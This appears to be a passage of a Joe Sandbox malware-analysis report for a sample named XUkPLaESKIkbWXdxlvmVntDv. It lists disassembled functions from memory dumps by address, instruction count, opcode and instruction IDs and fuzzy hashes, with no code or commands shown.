                                                              • Opcode Fuzzy Hash: 074f02f4a3a844729ce2f642716286263a53ab160e79d62080188a996fe07005
                                                              • Instruction Fuzzy Hash: ACC27F61B5C91A4FEB98FA18C4A17B873E2FF99350F1446B9D11DD3287CE39AC428781
                                                              Function 00007FFD34320D8F Relevance: 5.0, Strings: 3, Instructions: 1262COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0n=4$r<4$r<4
                                                              • API String ID: 0-3747765859
                                                              • Opcode ID: 49b6bbeff263cbcb919d5bcd308c969162305822821208531a45246284a02cbd
                                                              • Instruction ID: 4f4276521b09b18ab8c021330f6a42f9e77aa84fcb1a4ed8ab70c97e44bcdd35
                                                              • Opcode Fuzzy Hash: 49b6bbeff263cbcb919d5bcd308c969162305822821208531a45246284a02cbd
                                                              • Instruction Fuzzy Hash: 12929E61B5891A4BEB98FA18C4A27B973E2FF9A340F1445B9D11DD3283CE3DAC42D741
                                                              Function 00007FFD34323979 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 96d15ac368076cb21193880ca24f121ddfb0d678f3239cdad0c62982e62b70cc
                                                              • Instruction ID: ae3a1373bb0336820d68d8c29b7320a667a5c967b495ca9c676fd43052380f65
                                                              • Opcode Fuzzy Hash: 96d15ac368076cb21193880ca24f121ddfb0d678f3239cdad0c62982e62b70cc
                                                              • Instruction Fuzzy Hash: 2CF0657154E3C14FCB16A6348869555BFA0EF6721174A51EEC046CF5A3EA2D8845C702
                                                              Function 00007FFD34310A19 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36fb91256173323746c1c2a247a1563ee45288289b29798c35895bbb6c4e3054
                                                              • Instruction ID: 2d8e9d4b965ecc2e4b07b23f5d12cc650cf956b185bdc903b964bcbabad5db3f
                                                              • Opcode Fuzzy Hash: 36fb91256173323746c1c2a247a1563ee45288289b29798c35895bbb6c4e3054
                                                              • Instruction Fuzzy Hash: B4714812B5DA8A0AE368763D18A52F976D2DF8B311F25027ED5DFC36C3DC2CA8079245
                                                              Function 00007FFD34311A0D Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c9e49ff9184b1c6bfdb95f75d54a674f4223a8459fc6ff9b5516541a5240843
                                                              • Instruction ID: 7f6fb2d65056e8f352927b7aaf34cf348ed4ffb5a75f0ac672a26ff0116d78fd
                                                              • Opcode Fuzzy Hash: 3c9e49ff9184b1c6bfdb95f75d54a674f4223a8459fc6ff9b5516541a5240843
                                                              • Instruction Fuzzy Hash: A681D972A0D69A4FEB51EB68D4B52E97FA0FF57310F0802BBD088DB1A3DE285445C741
                                                              Function 00007FFD3431083D Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97f6336c735c75d45bb9ed92169460da487beb29a0aa33e45d1484ed3443be7e
                                                              • Instruction ID: 0ce192c551396a90b790c8c3272129e08ffbed32519b75dfbed29469f7ea5098
                                                              • Opcode Fuzzy Hash: 97f6336c735c75d45bb9ed92169460da487beb29a0aa33e45d1484ed3443be7e
                                                              • Instruction Fuzzy Hash: 6A511A32F4C6588FE7A4FB2CC4A56EA77E0FF5A310B05417AE199C72A2DE389845C741
                                                              Function 00007FFD34311C45 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ffad47853bd0872cb43f189ca7b6362790f206101a44d6173f89fd463afc04f
                                                              • Instruction ID: cba655cdf84a0ebea49e1b56a4a029d565e7a3c1994e1b01b8c8c342c1db5945
                                                              • Opcode Fuzzy Hash: 1ffad47853bd0872cb43f189ca7b6362790f206101a44d6173f89fd463afc04f
                                                              • Instruction Fuzzy Hash: F241C3B1A04A898FFB88DF58D4A93F87AD0EB5A311F50027ED00DE73A2CABD1444C740
                                                              Function 00007FFD3431155D Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 549151131ef24e952e2adf021d62abe9b8b459fba61ac1136397f2f92d334d29
                                                              • Instruction ID: 16596a3d2af63abef77e4de0c66e794f72d7dd0063b4cb800ede1268e7744254
                                                              • Opcode Fuzzy Hash: 549151131ef24e952e2adf021d62abe9b8b459fba61ac1136397f2f92d334d29
                                                              • Instruction Fuzzy Hash: 7031E232B0D2898FEB01FBA8D8612D8BBB0EF07321F1841B7C154C7182DA385549CB91
                                                              Function 00007FFD343112E8 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2152ba70d836cb78be322485603b077a3ea61df77f06c9f471b0ac4fbf2a813
                                                              • Instruction ID: 3496341a50c94543222340703a7982dd2d2fd480890b14ed76d0b79b5512e067
                                                              • Opcode Fuzzy Hash: e2152ba70d836cb78be322485603b077a3ea61df77f06c9f471b0ac4fbf2a813
                                                              • Instruction Fuzzy Hash: A321D421B5C9590FEB98F76C94A96B976C6EB9E361B5400BAE40DC32D3DC3CAC418281
                                                              Function 00007FFD34310CB9 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256420aec1ad9ab30854e83d064619a46b3278a6132e93da082f59897341ab0c
                                                              • Instruction ID: 9b965e2f3437710d2153d9da9f720f62e44ea24b1c98998ee95584185f973411
                                                              • Opcode Fuzzy Hash: 256420aec1ad9ab30854e83d064619a46b3278a6132e93da082f59897341ab0c
                                                              • Instruction Fuzzy Hash: 1821B761B4D39606E378712C6CB12B47FF1DF87200F18017AE09AC7AC3EC2DA815A380
                                                              Function 00007FFD34310868 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bf66cc42248f28abf3d8254ddaf5137ecfcb5aa7ed10280d6a8a7118c203d88
                                                              • Instruction ID: 36d0904702f0d5dd2f7b6c95f59a3d878460c6f579572ef03b82ae9a4ab6e781
                                                              • Opcode Fuzzy Hash: 8bf66cc42248f28abf3d8254ddaf5137ecfcb5aa7ed10280d6a8a7118c203d88
                                                              • Instruction Fuzzy Hash: 2011277299D7584FD761BB2884994EA7BF0FB4A215F10053FE59AC3241DA3498058782
                                                              Function 00007FFD34311E1D Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ada12d6f3d93cd0f0c28fe7b357deefa92d2a103011bf6e7fd0638e27cb5715
                                                              • Instruction ID: 92ddcd4aaf711c5de5e0c97473ff6066b2deb0952334d762db583f0f3a6d8237
                                                              • Opcode Fuzzy Hash: 9ada12d6f3d93cd0f0c28fe7b357deefa92d2a103011bf6e7fd0638e27cb5715
                                                              • Instruction Fuzzy Hash: BC01F21198E6D50FD72A66A48CB16E17FE4CF8B51470901FAD086CB4A3CC5D5882C361
                                                              Function 00007FFD34311588 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25faceeb3ca76dfa865c6a9df3b7204186dff8ff1c23f5cdb14a31e8ef631877
                                                              • Instruction ID: 1d3e317fae429a6b52c3fa8bbc98e1cde8604ed8e5f0e00dc1f600c6fce60f40
                                                              • Opcode Fuzzy Hash: 25faceeb3ca76dfa865c6a9df3b7204186dff8ff1c23f5cdb14a31e8ef631877
                                                              • Instruction Fuzzy Hash: E011AC35B096898FEB02FBB8D8A11D9BFB0EF47310F1941B7C090D7182E638565ACB81
                                                              Function 00007FFD34311590 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54e1577b2cc94440e404aeda3bb841f21fb33c2a00dff6cc5999f8eba22f98a1
                                                              • Instruction ID: 3f8523eab045a432cd30afe0124618f5a59e70b78eae65415b461f66c184d20d
                                                              • Opcode Fuzzy Hash: 54e1577b2cc94440e404aeda3bb841f21fb33c2a00dff6cc5999f8eba22f98a1
                                                              • Instruction Fuzzy Hash: D601AD35B096888FEB02FB78C8A11D9BFB0EF07310F1841E7C095D7192DA385649CB81
                                                              Function 00007FFD34311598 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b1be3e5329b87d62feeb213cfeaa8623c886ad79ed70c8d26b966fda3044c93
                                                              • Instruction ID: 558bd3a3f95f1baab41ee63120ee4a6c343d9739cd5fc94c03d5c19d6e84f025
                                                              • Opcode Fuzzy Hash: 2b1be3e5329b87d62feeb213cfeaa8623c886ad79ed70c8d26b966fda3044c93
                                                              • Instruction Fuzzy Hash: 2A015E35A0D6898FDB02FB78C8A01D9BFB0EF07310F1842E6D185D7192D9385649C745
                                                              Function 00007FFD343115A0 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 333187a0137b63e0a6ad44368464a8f9721890856fc733ed025897b5875e1633
                                                              • Instruction ID: 642638c1666e5eee687134263f6790e335071151d4bfe7d2f67fd880e589f929
                                                              • Opcode Fuzzy Hash: 333187a0137b63e0a6ad44368464a8f9721890856fc733ed025897b5875e1633
                                                              • Instruction Fuzzy Hash: A3016234A4D2899FEB12EB74C8A41DD7FB0AF07304F1842E6D145D7193D93C5A44D745
                                                              Function 00007FFD343246FB Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                              • Instruction ID: cc481b321df62d2db64818edca24ffa99e1cfca3434ea72cb8e0a72ae967e0ed
                                                              • Opcode Fuzzy Hash: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                              • Instruction Fuzzy Hash: ABF05431B8C9074BE654BA1CD8D06B93290EF67350F154175D65EC32C7EF3DE841AA81
                                                              Function 00007FFD34311E50 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 588832061d5a5e48c3ab9b469fd13c6f88e525ea729c2fcceedf63a079d48ea4
                                                              • Instruction ID: c1cafb13554579ebe27f39d5accbf2c7490eace7b889355060f54e8f7dab7c99
                                                              • Opcode Fuzzy Hash: 588832061d5a5e48c3ab9b469fd13c6f88e525ea729c2fcceedf63a079d48ea4
                                                              • Instruction Fuzzy Hash: 20E08625B5C85907DB7CB5B468B26F57291DB4A618B05567AD01AC3282CC5D5C818291
                                                              Function 00007FFD34325108 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                              • Instruction ID: 3a2e91e5fda34eb3a9df4fa0d0eb49f9dcca3711b04a1e8ed537feae1ce4b21b
                                                              • Opcode Fuzzy Hash: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                              • Instruction Fuzzy Hash: DBD05E30B609094B8B4CB62D8468431B3D1EBAA2067D45278940BC3295ED29ECC68B84
                                                              Function 00007FFD34323990 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                              Function 00007FFD34314D19 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction ID: 57e66128805efbe68af01c42634f20d9939dd33dfb518122a16e1d32f5aa6379
                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction Fuzzy Hash: 0EE0ED20B4801A46FB64B544C8A0BB86290EB4E300F1041B4DA4EE32C1CD3CAE45EB55
                                                              Function 00007FFD34323F7E Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5031255376026670e3bf28139977e82307626d5fef5eb4083f12d82f48f19c3
                                                              • Instruction ID: 810560b5c6f1fbda1dd183e0d7704762fee17f343f4f9d3c97789d593b9bca8e
                                                              • Opcode Fuzzy Hash: a5031255376026670e3bf28139977e82307626d5fef5eb4083f12d82f48f19c3
                                                              • Instruction Fuzzy Hash: 1FE0EC71E1461E8BEB54EB94D8A87BD76B6FF59344F00013AD11DEB291DE382C118B41
                                                              Function 00007FFD34312759 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1c020703e54b54e3b188db8ce449cba95cf2faac2895e34bca5a06e88b04ad7
                                                              • Instruction ID: 3d0aff3558a3801e3f750c97c4ec55503ea4df173992c66d64fbdc3993fcd920
                                                              • Opcode Fuzzy Hash: f1c020703e54b54e3b188db8ce449cba95cf2faac2895e34bca5a06e88b04ad7
                                                              • Instruction Fuzzy Hash: 73D0C771E5C5554BDB91E908C4E47597791FB59340F1542E5D80CE3247C639EE81FB40
                                                              Function 00007FFD34311765 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: 1c9cf5fac5d8172267512b44e27baa82cd5f270016968f4cf4564691329d849c
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: BDC08C38655808CFC908FB2DC88890833B0FB0F304BD200A0E10DC7271D629DCC2D781
                                                              Function 00007FFD34310705 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: fa8ec00066e9e00c4be34718b80e61ec940e469dcdf401058b085996d0ffd569
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 7AC08C00FCA80A00A921312A24E60ECA1209BCF210FD01032D30CC2481AC7D2086A592
                                                              Function 00007FFD34310728 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: 588aafe86a0c45c30edff887fde012fc6bed75a6f9aee07329de2305f253b40e
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: 4BB01200DD680E009914317528D70A474005B8F100FC01170D608C1082D8AD10956292
                                                              Function 00007FFD34325DBF Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000031.00000002.3686019528.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_49_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                              • Instruction ID: 191527a3030299743aedaba7d7b9a48c0fa3c9fe98fa727dce5fb758d45eab0f
                                                              • Opcode Fuzzy Hash: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                              • Instruction Fuzzy Hash: 40B09220B8815A8BE380B940C4A13AA21026F4A340F108831D91E832C289BDA900A692

                                                              Executed Functions

                                                              Function 00007FFD34310A19 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36fb91256173323746c1c2a247a1563ee45288289b29798c35895bbb6c4e3054
                                                              • Instruction ID: 2d8e9d4b965ecc2e4b07b23f5d12cc650cf956b185bdc903b964bcbabad5db3f
                                                              • Opcode Fuzzy Hash: 36fb91256173323746c1c2a247a1563ee45288289b29798c35895bbb6c4e3054
                                                              • Instruction Fuzzy Hash: B4714812B5DA8A0AE368763D18A52F976D2DF8B311F25027ED5DFC36C3DC2CA8079245
                                                              Function 00007FFD34311A0D Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0218dabc9cc91a6cc1d5e4919b25008fa10da6e6ccffcaac5b9c4a001494f608
                                                              • Instruction ID: 6942563fbb73dc222895a54c42a4c5c312aadf9c6bce5460e06957e94d4bbec6
                                                              • Opcode Fuzzy Hash: 0218dabc9cc91a6cc1d5e4919b25008fa10da6e6ccffcaac5b9c4a001494f608
                                                              • Instruction Fuzzy Hash: 5781D962A0D69A4FEB51EB68D4B52E97FE0FF57310F0802BBD048DB1A3DE295445C741
                                                              Function 00007FFD3431083D Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b422eaa21f703e465d2812151eced413e51a5ceb1846857acb08f3d5be06944b
                                                              • Instruction ID: 1eadc15d2462e014af22a826ccc8bdb2fa2a395726c9dd5664ef6cfb6414e93d
                                                              • Opcode Fuzzy Hash: b422eaa21f703e465d2812151eced413e51a5ceb1846857acb08f3d5be06944b
                                                              • Instruction Fuzzy Hash: 90510B32F4C6588FD7A0FB2C84A56EA77E0FF5A310F05417AE559C72A2DE389841C741
                                                              Function 00007FFD34311C45 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c16cf76df11119007b65a6a6444297d6c041691e8633f59d16b30a077795878
                                                              • Instruction ID: 8801e31283c005391bae9414981ab040b4dc9cac91f130a95d7ea956426416b4
                                                              • Opcode Fuzzy Hash: 9c16cf76df11119007b65a6a6444297d6c041691e8633f59d16b30a077795878
